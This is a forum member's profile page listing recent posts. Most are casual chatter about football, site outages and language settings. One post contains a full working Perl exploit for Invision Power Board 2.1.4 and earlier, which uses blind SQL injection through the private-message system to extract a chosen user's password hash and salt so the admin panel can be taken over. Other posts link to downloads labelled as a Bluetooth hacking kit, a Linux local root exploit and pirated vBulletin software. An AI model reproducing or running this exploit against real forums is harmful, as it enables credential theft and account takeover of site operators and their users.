Jump to content

Ecstasy

Members
  • Posts

    24
  • Joined

  • Last visited

    Never

Recent Profile Visitors

The recent visitors block is disabled and is not being shown to other users.

Ecstasy's Achievements

Newbie

Newbie (1/14)

10

Reputation

  1. Hmm, thruthewire.net has pinched all of IronGeek's video's lol...
  2. Hey, If anyone is interested in football, who do you think is going to win the world cup ? I think Brasil has a good chance, but personally I would like England to win. So let me know what you guys think
  3. Ahh, ok then thanks for letting me know guys
  4. #!/usr/bin/perl ############################################################################# ## IPB <=2.1.4 exploit (possibly 2.1.5 too)                  ## Brought to you by SHAK AND TEMUJIN.                 ## Originally by the Ykstortion security team.       ##                        ## The exploit will retrieve the MD5 pass hash along with the case ## sensitive salt ## ## The bug is in the pm system so you must have a registered user.      ## The exploit will extract a password hash from the forum's data base of   ## the target user.                              ## You need to know the target user's member ID but it's not difficult to   ## find out, just look under their avatar next to one of their posts.     ## After you run the exploit, crack the hash with the salt                ## and log into the ACP ## ## Usage:                                   ##  $ ./ipb                                 ##  IPB Forum URL ? forums.example.com/forums                ##  Your username ? krypt_sk1dd13                      ##  Your pass ? if_your_on_nix_this_gets_hidden               ##  Target userid ? 3637                           ##                                      ##  Attempting to extract password hash from database...          ##  537ab2d5b37ac3a3632f5d06e8e04368 ##  Attempting to extract password salt from database... ##  _jnDE ##  Hit enter to quit.                            ##                                      ## Requirements:                               ##  o Perl 5                                ##  o LWP 5.64 or later                           ##  o Internet access                            ##  o A forum                        ##  o A user on said forum                          ##  o 32+ PMs left till your inbox is full, if not you can still delete   ##   PMs from your inbox as the successful ones come through        ##                                      ## Credit to: Nuticulus for finding the SQL injection             ##                                                             ###########################################################################  use HTTP::Cookies; use LWP 5.64; use HTTP::Request;  # variables my $login_page = '?act=Login&CODE=01'; my $pm_page = '?act=Msg&CODE=04'; my $pose_pm_page = '?'; my $tries = 5; my $sql = ''; my $hash = ''; my $need_null = 0; my $i; my $j;  my @charset = ('0'..'9','a'..'f');  my %form = (act    => 'Msg',  CODE    => '04',  MODE    => '01',  OID    => '',  removeattachid  => '',  msg_title  => 'asdf',  bbmode    => 'normal',  ffont    => 0,  fsize    => 0,  fcolor    => 0,  LIST    => ' LIST ',  helpbox    => 'Insert Monotype Text (alt + p)',  tagcount  => 0,  Post    => 'jkl');    # objects my $ua = LWP::UserAgent->new; my $cj = HTTP::Cookies->new (file => "N/A", autosave => 0); my $resp;  # init the cookie jar $ua->cookie_jar ($cj);  # allow redirects on post requests push @{ $ua->requests_redirectable }, "POST";  # get user input print 'IPB Forum URL ? '; chomp (my $base_url = <STDIN>); print 'Your username ? '; chomp (my $user = <STDIN>); $form{entered_name} = $user; print 'Your pass ? '; #system 'stty -echo';    # to turn off echoing chomp (my $pass = <STDIN>); #system 'stty echo';    # to turn it back on print "n"; print 'Target userid ? ';  # it'll say next to one of their posts chomp (my $tid = <STDIN>);  # parse the given base url if ($base_url !~ m#^[url]http://#[/url]) { $base_url = 'http://' . $base_url } if ($base_url !~ m#/$|index.php$#) { $base_url .= '/' }  do {  $resp = $ua->post ($base_url . $login_page,    [ UserName => $user,     PassWord => $pass,     CookieDate => 1,    ]); } while ($tries-- && !$resp->is_success());  # reset tries $tries = 5;  # did we get 200 (OK) ? if (!$resp->is_success()) { die 'Error: ' . $resp->status_line . "n" }  # was the pass right ? if ($resp->content =~ /sorry, the password was wrong/i) {  die "Error: password incorrect.n"; }  # get ourselves a post_key (and an auth_key too with newer versions) do {  $resp = $ua->get ($base_url . $pm_page); } while ($tries-- && !$resp->is_success());  # reset tries $tries = 5;  if (!$resp->is_success()) { die 'Error: ' . $resp->status_line . "n" } if ($resp->content =~ m#<inputs+?type=["']?hidden["']?s+?name=["']?post_key["']?s+?value=["']?([0-9a-f]{32})["']?s+?/>#) {  $form{post_key} = $1; } else {  die "Error: couldn't get a post key.n"; } if ($resp->content =~ m#<inputs+?type=["']?hidden["']?s+?name=["']?auth_key["']?s+?value=["']?([0-9a-f]{32})["']?s+/>#) {  $form{auth_key} = $1; }  # turn off buffering so chars in the hash show up straight away $| = 1;  print "nAttempting to extract password hash from database...n ";  OFFSET: for ($i = 0; $i < 32; ++$i) {  CHAR:  for ($j = 0; $j < scalar(@charset); ++$j) {    # reset tries    $tries = 5;    print "x08", $charset[$j];    # build sql injection    $sql = '-1 UNION SELECT ' . ($need_null ? '0, ' : '') . 'CHAR('      . (join (',', map {ord} split ('', $user))) . ') FROM '      . 'ibf_members_converge WHERE converge_id = ' . $tid . ' AND MID('      . 'converge_pass_hash, ' . ($i + 1) . ', 1) = CHAR('      . ord ($charset[$j]) . ')';    $form{from_contact} = $sql;    $resp = $ua->post ($base_url . $post_pm_page, %form,     referer => $base_url . $pm_page);    if (!$resp->is_success()) {     die "nError: " . $resp->status_line      . "n" if (!$tries);     --$tries;     redo;    }    if ($resp->content =~ /sql error/i) {     if ($need_null) {       die "Error: SQL error.n";     } else {       $need_null = 1;       redo OFFSET;     }    } elsif ($resp->content !~ /there is no such member/i) {     # we have a winner !     print ' ';     next OFFSET;    }  }  # uh oh, something went wrong  print "nError: couldn't get a char for offset $in"; }  @charset = (); for($j = 33; $j <= 126; $j++) { push(@charset, chr($j)); }  print "nAttempting to extract password salt from database...n ";  OFFSET: for ($i = 0; $i < 5; ++$i) {  CHAR:  for ($j = 0; $j < scalar(@charset); ++$j) {    # reset tries    $tries = 5;    print "x08", $charset[$j];    # build sql injection    $sql = '-1 UNION SELECT ' . ($need_null ? '0, ' : '') . 'CHAR('      . (join (',', map {ord} split ('', $user))) . ') FROM '      . 'ibf_members_converge WHERE converge_id = ' . $tid . ' AND MID('      . 'converge_pass_salt, ' . ($i + 1) . ', 1) = BINARY CHAR('      . ord ($charset[$j]) . ')';    $form{from_contact} = $sql;    $resp = $ua->post ($base_url . $post_pm_page, %form,     referer => $base_url . $pm_page);    if (!$resp->is_success()) {     die "nError: " . $resp->status_line      . "n" if (!$tries);     --$tries;     redo;    }    if ($resp->content =~ /sql error/i) {     if ($need_null) {       die "Error: SQL error.n";     } else {       $need_null = 1;       redo OFFSET;     }    } elsif ($resp->content !~ /there is no such member/i) {     # we have a winner !     print ' ';     next OFFSET;    }  }  # uh oh, something went wrong  die "nError: couldn't get a char for offset $in"; }  print "x08 x08nHit enter to quit.n"; <STDIN>;
  5. Thanks! :@
  6. Any one know why h4cky0u.org is offline ?
  7. BlueTooth Hacking Kit. http://d.turboupload.com/d/722626/Bluetooth-Hacking-Kit.zip.html
  8. By sys7em. http://rapidshare.de/files/18195248/Root_on_Linux.rar.html
  9. Linux local root http://www.sh3ll.persiangig.com/Film/Linux%20Local%20Root.rar
  10. vBulletin 3.5.x http://d.turboupload.com/d/736458/Vbulletin_3.5.x._By_Cro-Warez.rar.html
  11. Thanks
  12. Lmao, thanks a lot mate
  13. Hi, I'm wondering is there a way I can make the board use english ? because I cannot speak romanian :@Cheers
×
×
  • Create New...